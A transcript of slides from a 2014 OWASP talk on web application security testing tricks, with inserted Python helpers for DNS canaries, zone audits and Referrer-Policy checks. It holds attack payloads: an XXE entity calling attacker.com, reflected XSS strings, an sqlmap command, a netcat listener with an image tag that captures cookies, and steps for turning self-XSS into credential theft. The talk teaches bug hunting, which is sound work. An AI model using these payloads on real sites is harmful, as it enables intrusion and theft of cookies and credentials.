"Tricks in web application security assessment – advanced version", Sergey Belov

OWASP Russia Meetup #1

OWASP Moscow

December 04, 2017
Transcript

  1. Tricks in web application security assessment - advanced version. Sergey Belov, Digital Security. OWASP Moscow, 6 Dec 2014
  2. Work/Activity: bug hunting, speaking. Hey!

  3. XXE/SSRF detection via DNS

  4. XXE/SSRF detection via DNS. SSRF: 1) Submit a site <link to the site> 2) A bot checks the site 3) Instead of the external site, a local address is substituted, or the scheme is replaced (file:///)
  5. XXE/SSRF detection via DNS. XXE: 1) XML: <?xml version="1.0" encoding="ISO-8859-1"?> 2) with an entity: <!ENTITY xxe SYSTEM "http://attacker.com" >]> 3) The parser tries to load the entity from the external site
  6. XXE/SSRF detection via DNS. Difficulties when hunting: 1) Is it there or not? 2) Request timing 3) Firewall 4) Other restrictions
  7. XXE/SSRF detection via DNS. (Diagram: DNS leak, DNS server)

  8. XXE/SSRF detection via DNS. The link contains a domain -> the domain has to be resolved
  9. XXE/SSRF detection via DNS. Instructions: 1) Your own server (VPS) – 12.34.56.78 2) Point attacker.com at your own NS servers: NS1: 12.34.56.78; NS2: 12.34.56.78 3) dnschef 4) python dnschef.py -i 0.0.0.0
  10. XXE/SSRF detection via DNS. Real example: they say it follows links in chat...
  11. XXE/SSRF detection via DNS. Scenario 1: 1) User 1 -> User 2: http://skype-example.com 2) # cat access.log | grep "skype-example" | wc -l 3) 0
  12. XXE/SSRF detection via DNS. Scenario 2 – DNS: caught :]
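The DNS-based confirmation in slides 9 to 12, as an added example that is not from the talk: each test case embeds a unique canary hostname under a zone whose NS points at a listener you control, and the listener's query log is correlated back to the test cases. The zone name, the log line format and the log lines themselves are constructed here (adapt the regex to what dnschef or your resolver actually writes).

```python
import re
import secrets

# Assumed: a zone whose NS records point at a DNS listener you control
# (the talk uses attacker.com with dnschef; the name here is constructed).
ZONE = "canary.example"

def make_canary(test_id, zone=ZONE, rng=secrets.token_hex):
    """Unique hostname to embed in one test payload: the random label
    prevents guessing, the test id ties a lookup back to its test case."""
    return f"{rng(6)}.{test_id}.{zone}".lower()

def xxe_payload(hostname):
    """External-entity document (the shape shown on slide 5) that makes a
    vulnerable parser resolve hostname even when no HTTP request gets out."""
    return ('<?xml version="1.0" encoding="ISO-8859-1"?>\n'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://{hostname}/">]>\n'
            '<foo>&xxe;</foo>')

# Constructed log shape: "[time] client_ip: <message> for <qname>".
LOG_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] (?P<src>\S+?): .* for (?P<qname>[\w.-]+)$")

def correlate(log_lines, canaries):
    """canaries: {hostname: test_id}. Returns {test_id: [(timestamp, resolver_ip), ...]}
    for every test whose canary was looked up. A test missing from the result
    produced no resolution, which answers the 'is it there or not?' of slide 6."""
    hits = {}
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        qname = m.group("qname").lower().rstrip(".")
        test_id = canaries.get(qname)
        if test_id is not None:
            hits.setdefault(test_id, []).append((m.group("ts"), m.group("src")))
    return hits

if __name__ == "__main__":
    canaries = {make_canary(t): t for t in ("xxe-upload", "ssrf-link-preview")}
    for host, t in canaries.items():
        print(t, "->", host)
```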

  13. CSP bypass – js as image

  14. CSP bypass – js as image

  15. CSP bypass – js as image. Image == js file. Gif injector - http://pastebin.com/6yUbfGX5
  16. CSP bypass – js as image. 1) Ability to upload files to domains allowed by the CSP 2) Upload an image<->js polyglot and include it: <script src=".../image.gif"></script>. Recent Chrome versions have learned to block this.
  17. CloudFlare – real IP detection

  18. CloudFlare – real IP detection

  19. CloudFlare – real IP detection

  20. CloudFlare – real IP detection. CloudFlare Free, Pro and Business plan: "We do not proxy wildcard records". CloudFlare Enterprise: "For CloudFlare Enterprise customers, we do proxy wildcard records"
  21. CloudFlare – real IP detection ping randoOm.victim.com => REAL IP

  22. XSS && urlencode

  23. XSS & urlencode. Web server: ?xss=<script>alert(1)</script>

  24. XSS & urlencode. 1) Not all web servers perform urldecode 2) The XSS is reflected, but only after urlencode 3) The XSS does not execute 4) IE comes to the rescue!
  25. XSS & urlencode. Only after the question mark

  26. XSS & urlencode. But what if... http://domain.com/path/<xss_here>/etc/

  27. XSS & urlencode. http://domain.com/path/<xss>/etc/ IE only (including v11): header("Location: http://domain.com/path/<xss>/etc/");

  28. XSS & urlencode

  29. SQLmap

  30. SQLmap

  31. SQLmap -u http://vuln.com/vote.php --data="id=1&hash=2" --eval="import hashlib;hash=hashlib.md5('123'+id+'456').hexdigest()"

  32. Tricky situations - bug bounty

  33. Situation #1 – Same Site Scripting. XXXYYYZZZ.target.com => 127.0.0.1 What's wrong?
  34. Situation #1 – Same Site Scripting

  35. Situation #1 – Same Site Scripting. External IP – 12.34.56.78; Loopback – 127.0.0.1
  36. Situation #1 – Same Site Scripting. Attacker: 1) nc -lv 10024 2) email to victim@corp.xxx with <img src="http://xxyyzz.target.com:10024"> Victim: 1) Open the email and... 2) Load the image with *.target.com cookies! (that is why it is important to know how to set cookies correctly - http://habrahabr.ru/post/143276/)
  37. Situation #1 – Same Site Scripting. http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml

  38. Situation #1 – Same Site Scripting. XXXYYYZZZ.target.com => 10.0.0.22 http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
  39. Situation #1 – Same Site Scripting. https://hackerone.com/reports/1509 - $100
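A check a domain owner can run over their own zone for the condition in slides 33 to 38 (a public name under the site's domain resolving to loopback or an internal address, so it shares the site's cookies while pointing at something local). This is an added example, not from the talk; the zone records below are constructed and mirror the slides' addresses.

```python
import ipaddress

# Address ranges that should not sit behind a hostname under a cookie-bearing
# domain: loopback, RFC 1918, link-local, IPv6 ULA. Listed explicitly rather
# than via ip.is_private so documentation ranges are not flagged.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

def classify(addr):
    """'loopback', 'internal' or 'public' for one A/AAAA value."""
    ip = ipaddress.ip_address(addr)
    for net in INTERNAL_NETS:
        if ip in net:
            return "loopback" if ip.is_loopback else "internal"
    return "public"

def audit_zone(records, parent):
    """records: iterable of (name, rtype, value). Returns findings
    (fqdn, value, kind) for A/AAAA names under parent that point inside."""
    findings = []
    parent = parent.rstrip(".").lower()
    for name, rtype, value in records:
        if rtype not in ("A", "AAAA"):
            continue
        fqdn = name.rstrip(".").lower()
        if fqdn != parent and not fqdn.endswith("." + parent):
            continue
        kind = classify(value)
        if kind != "public":
            findings.append((fqdn, value, kind))
    return findings

# Constructed sample zone; in practice feed this an AXFR or provider export.
ZONE = [
    ("www.target.com.", "A", "12.34.56.78"),
    ("localhost.target.com.", "A", "127.0.0.1"),
    ("xxxyyyzzz.target.com.", "A", "10.0.0.22"),
    ("mail.target.com.", "MX", "10 mx.target.com."),
    ("v6.target.com.", "AAAA", "2001:db8::1"),
]

if __name__ == "__main__":
    for fqdn, value, kind in audit_zone(ZONE, "target.com"):
        print(f"{fqdn} -> {value} ({kind})")
```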

  40. Situation #2 – Self XSS

  41. Situation #2 – Self XSS. XSS only for you – no impact?
  42. Situation #2 – Self XSS

  43. Situation #2 – Self XSS. Requirements: 1) CSRF for logout O_o 2) CSRF for login o_O
  44. Situation #2 – Self XSS. Steps: 1) Save the (self-)XSS for yourself 2) Log the victim out 3) Log the victim in with your creds 4) Draw a window 5) Catch the user's creds!
  45. Situation #2 – Self XSS Google and self-XSS

  46. Situation #2 – Self XSS. Share an account and attack your victim
  47. Situation #3 – evil HTTP referers

  48. Situation #3 - HTTP referer. <a href="http://external.com">Go!</a> In the request headers: ... Referer: http://yoursite.com/ ... But what about external resources on the web page, such as images, styles...?
  49. Situation #3 - HTTP referer. http://super-website.com/user/passRecovery?t=SECRET ... <img src=http://comics-are-awesome.com/howto-choose-password.jpg> ... The owner of comics-are-awesome.com knows all _SECRET_ tokens (from the Referer)!
  50. Situation #3 - HTTP referer https://hackerone.com/reports/738 - $100
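An added example, not from the talk, for the leak in slides 48 to 50: it computes what a browser sends in Referer for a sub-resource request under each Referrer-Policy value, so you can check which policies keep a token in the page URL (the ?t=SECRET above) away from a third-party image host. Policy semantics follow the W3C Referrer Policy spec; at the time of the talk browsers defaulted to no-referrer-when-downgrade, which leaks the full URL. The URLs are constructed.

```python
from urllib.parse import urlsplit, urlunsplit

def _host(p):
    return p.hostname + (f":{p.port}" if p.port else "")

def _origin(u):
    p = urlsplit(u)
    return f"{p.scheme}://{_host(p)}"

def _stripped(u):
    # A full referrer never carries userinfo or the fragment.
    p = urlsplit(u)
    return urlunsplit((p.scheme, _host(p), p.path, p.query, ""))

def referer_for(page_url, target_url, policy="no-referrer-when-downgrade"):
    """Referer value (or None) sent when page_url loads target_url under policy."""
    same_origin = _origin(page_url) == _origin(target_url)
    downgrade = (urlsplit(page_url).scheme == "https"
                 and urlsplit(target_url).scheme != "https")
    origin_only = _origin(page_url) + "/"
    if policy == "no-referrer":
        return None
    if policy == "origin":
        return origin_only
    if policy == "unsafe-url":
        return _stripped(page_url)
    if policy == "same-origin":
        return _stripped(page_url) if same_origin else None
    if policy == "strict-origin":
        return None if downgrade else origin_only
    if policy == "origin-when-cross-origin":
        return _stripped(page_url) if same_origin else origin_only
    if policy == "strict-origin-when-cross-origin":
        if same_origin:
            return _stripped(page_url)
        return None if downgrade else origin_only
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else _stripped(page_url)
    raise ValueError(f"unknown policy {policy!r}")

def leaks_secret(page_url, target_url, policy, secret):
    """True if the secret from the page URL reaches target_url's host via Referer."""
    ref = referer_for(page_url, target_url, policy)
    return ref is not None and secret in ref
```

The durable fix is still to keep tokens out of URLs (a POST body or a one-time page that redirects away before loading third-party content); the policy only limits how far the URL travels.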

  51. Situation #5 - Content-Security-Policy

  52. Situation #5 - Content-Security-Policy

  53. Situation #5 - Content-Security-Policy. CSP only for some browsers! Is it ok?
  54. Situation #5 - Content-Security-Policy. 1) Forks with different UA 2) Proxy cache 3) Load balancer... The bug hunter got $100, but...
  55. Situation #5 - Content-Security-Policy. Fail! Why: • "Partial support in Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header." • "Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages." • "Chrome for iOS fails to render pages without a connect-src 'self' policy." • Old FF problems (some versions between XX and YY)
  56. Situation #6 - Usernames

  57. Situation #6 - Usernames http://website.com/username

  58. Situation #6 - Usernames. Okay! Let's register: http://website.com/robots.txt http://website.com/sitemap.xml ...

  59. Situations XXX

  60. Situations XXX. • Info disclosure via CSS files (full path disclosure during compilation - file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\/assets\/stylesheets\/application\/browser-not-supported\.scss (bug #2221) • SPF and the same records • Short tokens • Pixel flood attack • CSRF for login/logout!? (hi Michal Zalewski!) • ... - https://hackerone.com/security?show_all=true
  61. Thanks! Questions? @sergeybelove